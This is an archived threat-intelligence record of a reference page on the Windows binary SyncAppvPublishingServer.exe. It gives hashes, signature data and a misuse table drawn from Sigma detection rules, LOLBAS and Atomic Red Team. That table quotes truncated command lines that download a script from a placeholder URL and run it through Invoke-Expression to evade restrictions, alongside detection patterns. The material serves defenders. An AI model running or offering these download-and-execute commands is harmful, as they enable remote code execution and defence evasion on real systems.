{
	"id": "a825d061-3c21-430e-8e54-44b49c3377be",
	"created_at": "2026-04-06T00:17:52.706735Z",
	"updated_at": "2026-04-10T03:21:27.091075Z",
	"deleted_at": null,
	"sha1_hash": "7d72989f91cff521db7251697897bf708c0dafde",
	"title": "SyncAppvPublishingServer.exe | Microsoft Application Virtualization Sync Utility",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127733,
	"plain_text": "SyncAppvPublishingServer.exe | Microsoft Application Virtualization\r\nSync Utility\r\nArchived: 2026-04-05 20:18:16 UTC\r\nSyncAppvPublishingServer.exePermalink\r\nFile Path: C:\\Windows\\system32\\SyncAppvPublishingServer.exe\r\nDescription: Microsoft Application Virtualization Sync Utility\r\nHashesPermalink\r\nType Hash\r\nMD5 3C291419F60CDF9C2E4E19AD89944FA3\r\nSHA1 0B6D803C876B6313CE08A79B2A98F6E3BAC97689\r\nSHA256 53A78D6C3D05552E616897712D0D16BF14D0030AF2BB367841B6AECC883FF218\r\nSHA384 D7A55317A767950F5682573888B9156EFCB9F7BD73D44A61FAD253B6BBCB9785E56AE0F8B87009CEF5047091D6F61562\r\nSHA512 587B9BC171988CB41E3A0B19AB7A242DB23D070F70429F8061D095C1CB142498E8A6239004055C83439E6AD4EE52735F9BF97C3145622D0CF710214020\r\nSSDEEP 768:G6FyyphiE9jr4jwmp3PwysQdwRUuKs27cRg1Pb7aJGgZ:G6t9jrN8P3sQOUwSuYPSJGI\r\nIMP 1EC41853BAB928648731DDAB143F3159\r\nPESHA1 EB4A6346C6342096471F65E6402E29B99ECEC8CF\r\nPE256 960CDC3E9C992799BF8FB7A29EB592C492079DA0F5CE562BA0261C509E4D1E08\r\nRuntime DataPermalink\r\nLoaded Modules:Permalink\r\nPath\r\nC:\\Windows\\System32\\combase.dll\r\nC:\\Windows\\System32\\GDI32.dll\r\nC:\\Windows\\System32\\gdi32full.dll\r\nC:\\Windows\\System32\\KERNEL32.DLL\r\nC:\\Windows\\System32\\KERNELBASE.dll\r\nC:\\Windows\\System32\\msvcp_win.dll\r\nC:\\Windows\\SYSTEM32\\ntdll.dll\r\nC:\\Windows\\System32\\ole32.dll\r\nC:\\Windows\\System32\\RPCRT4.dll\r\nC:\\Windows\\System32\\SHELL32.dll\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe\r\nC:\\Windows\\System32\\ucrtbase.dll\r\nC:\\Windows\\System32\\USER32.dll\r\nC:\\Windows\\System32\\win32u.dll\r\nSignaturePermalink\r\nStatus: Signature verified.\r\nSerial: 33000002EC6579AD1E670890130000000002EC\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 1 of 5\n\nThumbprint: F7C2F2C96A328C13CDA8CDB57B715BDEA2CBD1D9\r\nIssuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington,\r\nC=US\r\nSubject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US\r\nOriginal Filename: syncappvpublishingserver.exe\r\nProduct Name: Microsoft Windows Operating System\r\nCompany Name: Microsoft Corporation\r\nFile Version: 10.0.19041.1320 (WinBuild.160101.0800)\r\nProduct Version: 10.0.19041.1320\r\nLanguage: English (United States)\r\nLegal Copyright: Microsoft Corporation. All rights reserved.\r\nMachine Type: 64-bit\r\nFile ScanPermalink\r\nVirusTotal Detections: Unknown\r\nFile Similarity (ssdeep match)Permalink\r\nFile Score\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe 49\r\nC:\\Windows\\system32\\SyncAppvPublishingServer.exe 49\r\nPossible MisusePermalink\r\nThe following table contains possible examples of SyncAppvPublishingServer.exe being misused. While\r\nSyncAppvPublishingServer.exe is not inherently malicious, its legitimate functionality can be abused for malicious\r\npurposes.\r\nSource Source File Example\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma powershell_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma powershell_syncappvpublishingserver_exe.yml - 'SyncAppvPublishingServer.exe'\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma process_creation_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma process_creation_syncappvpublishingserver_exe.yml Image\\|endswith: '\\SyncAppvPublishingServer.exe'\r\nsigma image_load_in_memory_powershell.yml - '\\syncappvpublishingserver.exe'\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 2 of 5\n\nSource Source File Example\r\nsigma posh_pm_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma posh_pm_syncappvpublishingserver_exe.yml ContextInfo\\|contains: 'SyncAppvPublishingServer.e\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\ntitle: SyncAppvPublishingServer Execution to Bypas\r\nPowershell Restriction\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\ndescription: Detects SyncAppvPublishingServer proc\r\nexecution which usually utilized by adversaries to\r\nPowerShell execution restrictions.\r\nsigma posh_ps_syncappvpublishingserver_exe.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma posh_ps_syncappvpublishingserver_exe.yml ScriptBlockText\\|contains: 'SyncAppvPublishingServ\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\ntitle: SyncAppvPublishingServer Execute Arbitrary\r\nPowerShell Code\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\ndescription: Executes arbitrary PowerShell code us\r\nSyncAppvPublishingServer.exe.\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma proc_creation_win_syncappvpublishingserver_execute_powershell.yml Image\\|endswith: '\\SyncAppvPublishingServer.exe'\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\ntitle: SyncAppvPublishingServer VBS Execute Arbitr\r\nPowerShell Code\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\ndescription: Executes arbitrary PowerShell code us\r\nSyncAppvPublishingServer.vbs\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml\r\n- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishin\r\nsigma proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml - '\\SyncAppvPublishingServer.vbs'\r\nLOLBAS Syncappvpublishingserver.yml Name: SyncAppvPublishingServer.exe\r\nLOLBAS Syncappvpublishingserver.yml\r\n- Command: SyncAppvPublishingServer.exe \"n;(New-Ob\r\nNet.WebClient).DownloadString('http://some.url/scri\r\n\\| IEX\"\r\nLOLBAS Syncappvpublishingserver.yml\r\nUsecase: Use SyncAppvPublishingServer as a Powersh\r\nto execute Powershell code. Evade defensive counter\r\nmeasures\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\System32\\SyncAppvPublishingServ\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\SysWOW64\\SyncAppvPublishingServ\r\nLOLBAS Syncappvpublishingserver.yml\r\n- IOC: SyncAppvPublishingServer.exe should never b\r\nunless App-V is deployed\r\nLOLBAS Syncappvpublishingserver.yml Name: Syncappvpublishingserver.vbs\r\nLOLBAS Syncappvpublishingserver.yml\r\n- Command: SyncAppvPublishingServer.vbs \"n;((New-O\r\nNet.WebClient).DownloadString('http://some.url/scri\r\n\\| IEX\"\r\nLOLBAS Syncappvpublishingserver.yml - Path: C:\\Windows\\System32\\SyncAppvPublishingServ\r\natomic-red-teamindex.md - Atomic Test #2: SyncAppvPublishingServer - Execute a\r\nPowerShell code [windows]\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 3 of 5\n\nSource Source File Example\r\natomic-red-team\r\nindex.md\r\n- Atomic Test #1: SyncAppvPublishingServer Signed Scr\r\nPowerShell Command Execution [windows]\r\natomic-red-team\r\nwindows-index.md\r\n- Atomic Test #2: SyncAppvPublishingServer - Execute a\r\nPowerShell code [windows]\r\natomic-red-team\r\nwindows-index.md\r\n- Atomic Test #1: SyncAppvPublishingServer Signed Scr\r\nPowerShell Command Execution [windows]\r\natomic-red-team\r\nT1216.md\r\n- Atomic Test #1 - SyncAppvPublishingServer Signed Sc\r\nPowerShell Command Execution\r\natomic-red-team\r\nT1216.md\r\n## Atomic Test #1 - SyncAppvPublishingServer Signed S\r\nPowerShell Command Execution\r\natomic-red-team\r\nT1216.md\r\nExecutes the signed SyncAppvPublishingServer script wi\r\noptions to execute an arbitrary PowerShell command.\r\natomic-red-team\r\nT1216.md\r\nC:\\windows\\system32\\SyncAppvPublishingServer.vbs “\\n\r\n{command_to_execute}”\r\natomic-red-team\r\nT1218.md\r\n- Atomic Test #2 - SyncAppvPublishingServer - Execute\r\nPowerShell code\r\natomic-red-team\r\nT1218.md\r\n## Atomic Test #2 - SyncAppvPublishingServer - Execut\r\narbitrary PowerShell code\r\natomic-red-team\r\nT1218.md\r\nExecutes arbitrary PowerShell code using\r\nSyncAppvPublishingServer.exe. Requires Windows 10.\r\natomic-red-teamT1218.md SyncAppvPublishingServer.exe “n; #{powershell_code}”\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 4 of 5\n\nSource Source File Example\r\nMIT License. Copyright (c) 2020-2021 Strontic.\r\nSource: https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nhttps://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
	],
	"report_names": [
		"SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434672,
	"ts_updated_at": 1775791287,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.pdf",
		"text": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.txt",
		"img": "https://archive.orkl.eu/7d72989f91cff521db7251697897bf708c0dafde.jpg"
	}
}